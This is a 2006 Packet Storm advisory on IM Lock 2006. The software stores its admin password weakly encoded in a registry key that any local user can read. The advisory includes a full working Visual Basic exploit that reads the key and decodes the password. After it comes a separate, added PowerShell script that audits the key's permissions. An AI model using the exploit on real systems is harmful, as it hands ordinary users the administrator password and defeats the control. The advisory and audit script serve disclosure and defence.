imlock2006.txt

08 Mar 2006 | Reported by fRoGGz | Type: packetstorm | Source: packetstormsecurity.com

IM Lock 2006 discloses passwords to local users. It is vulnerable to an insecure registry permission.

Code
`IM Lock 2006 - Insecure Registry Permission Vulnerability  
---------------------------------------------------------  
  
Application: IM Lock 2006  
Vendor: www.comvigo.com  
Corporation: Comvigo, Inc.  
Version: Latest: (2 March 2006) - Home Edition, Enterprise & Professional  
Description: IM Lock 2006 discloses passwords to local users.  
  
  
Background:  
===========  
Security Auditing & Management software. IM Lock controls and blocks access to  
Instant Messaging and peer-to-peer services that waste time and that can infect  
computers with viruses. It blocks all popular services: MSN Messenger, Yahoo Messenger,  
ICQ, AIM, Skype, eMule, iTunes, ... We use several algorithms to detect and lock  
applications; the working portion of IM Lock is virtually invisible to the computer user.  
  
  
Vulnerability:  
==============  
The encrypted password is stored in the registry, and this key is readable by non-privileged users  
on the system, so by decoding the password a malicious user could gain access to the config panel.  
  
  
Exploit:  
========  
  
' ############################################################################  
' IM Lock 2006 - Local Password Encryption Weakness Exploit by fRoGGz  
' Versions: Home Edition, Enterprise & Professional  
' Application: IM Lock 2006  
' Distributor : Comvigo, Inc.  
' Link: http://www.comvigo.com  
' Vulnerable Description: IM Lock 2006 discloses passwords to local users.  
'  
' Discovered & Coded by fRoGGz  
' Credits to: SecuBox Labs - shadock.secubox.com  
'  
' ############################################################################  
  
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long  
  
Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" _  
(ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long  
  
Private Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" _  
(ByVal hKey As Long, _  
ByVal lpValueName As String, _  
ByVal lpReserved As Long, _  
lpType As Long, _  
lpData As Any, _  
lpcbData As Long) As Long  
  
Private Const ERROR_SUCCESS As Long = 0&  
  
Dim i As Integer  
Dim GetCrypt As String, Decrypt As String  
  
' Reads a REG_SZ value and returns it without the trailing null.  
Public Function GrabBDR(hKey As Long, strPath As String, strValue As String) As String  
    Dim keyhand As Long  
    Dim r As Long  
    Dim lResult As Long  
    Dim lValueType As Long  
    Dim strBuf As String  
    Dim lDataBufSize As Long  
    Dim intZeroPos As Integer  
  
    r = RegOpenKey(hKey, strPath, keyhand)  
    If r <> ERROR_SUCCESS Then Exit Function  
  
    ' First call only asks for the value type and the required buffer size.  
    lResult = RegQueryValueEx(keyhand, strValue, 0&, lValueType, ByVal 0&, lDataBufSize)  
  
    If lValueType = 1 Then ' REG_SZ  
        strBuf = String(lDataBufSize, " ")  
        lResult = RegQueryValueEx(keyhand, strValue, 0&, 0&, ByVal strBuf, lDataBufSize)  
        If lResult = ERROR_SUCCESS Then  
            intZeroPos = InStr(strBuf, Chr$(0))  
            If intZeroPos > 0 Then  
                GrabBDR = Left$(strBuf, intZeroPos - 1)  
            End If  
        End If  
    End If  
    ' Close the handle that was opened, not the predefined root key.  
    lResult = RegCloseKey(keyhand)  
End Function  
  
Private Sub Form_Load()  
    ' &H80000002 is HKEY_LOCAL_MACHINE.  
    GetCrypt = GrabBDR(&H80000002, "SOFTWARE\Microsoft\SvcHst\msnvs", "prc")  
    If GetCrypt <> "" Then  
        ' Each stored character is 255 minus the code of the original character.  
        For i = 1 To Len(GetCrypt)  
            Decrypt = Decrypt & Chr(255 - Asc(Mid(GetCrypt, i, 1)))  
        Next  
        MsgBox "ENCRYPT PASSWORD FOUND !" & vbCrLf & "YOUR PASSWORD IS: " & Decrypt, _  
            vbOKOnly, "Secubox Labs - Recovery"  
    Else  
        MsgBox "NO ENCRYPT PASSWORD FOUND !", vbCritical, "IM LOCK INSTALLED ?"  
    End If  
    End  
End Sub  
  
  
  
  
CREDiTS:  
========  
fRoGGz - unsecure[at]writeme[dot]com  
SecuBox Labs - secubox.shadock.net  
`
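
To check a host for the exposure the advisory describes, the following added example (not part of the original advisory or of any vendor tooling) lists access rules that let broad, non-administrative groups read the key holding the `prc` value. The key path and value name are taken from the advisory; the `WOW6432Node` path, the list of "broad" SIDs and the function name `Get-BroadReadRule` are assumptions made for this example.

```powershell
# Added example: audit who can read the registry key named in the advisory.
$ValueName = 'prc'
$KeyPaths = @(
    'HKLM:\SOFTWARE\Microsoft\SvcHst\msnvs',
    # Assumption: a 32-bit install on 64-bit Windows is redirected here.
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\SvcHst\msnvs'
)

# Well-known SIDs of groups that include ordinary local users.
$BroadSids = @{
    'S-1-1-0'      = 'Everyone'
    'S-1-5-11'     = 'Authenticated Users'
    'S-1-5-4'      = 'INTERACTIVE'
    'S-1-5-32-545' = 'BUILTIN\Users'
}
$QueryValues = [System.Security.AccessControl.RegistryRights]::QueryValues
$InheritOnly = [System.Security.AccessControl.PropagationFlags]::InheritOnly

function Get-BroadReadRule {
    param([Parameter(Mandatory)][string]$Path)
    foreach ($rule in (Get-Acl -Path $Path).Access) {
        if ($rule.AccessControlType -ne 'Allow') { continue }
        # Inherit-only entries apply to subkeys, not to this key itself.
        if ($rule.PropagationFlags -band $InheritOnly) { continue }
        if (-not ($rule.RegistryRights -band $QueryValues)) { continue }
        try {
            $sid = $rule.IdentityReference.Translate(
                [System.Security.Principal.SecurityIdentifier]).Value
        } catch { continue }  # account name that no longer resolves
        if ($BroadSids.ContainsKey($sid)) {
            [pscustomobject]@{
                Key       = $Path
                Principal = $BroadSids[$sid]
                Rights    = $rule.RegistryRights
                Inherited = $rule.IsInherited
            }
        }
    }
}

foreach ($path in $KeyPaths) {
    if (-not (Test-Path -Path $path)) { continue }
    $item = Get-ItemProperty -Path $path -Name $ValueName -ErrorAction SilentlyContinue
    if ($null -eq $item) { continue }  # key exists but holds no stored password
    Get-BroadReadRule -Path $path | Format-Table -AutoSize
}
```

Any row in the output means the stored value is readable by ordinary local accounts on that host. A row with `Inherited` set to `True` comes from the parent key's ACL rather than from an entry on the key itself.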
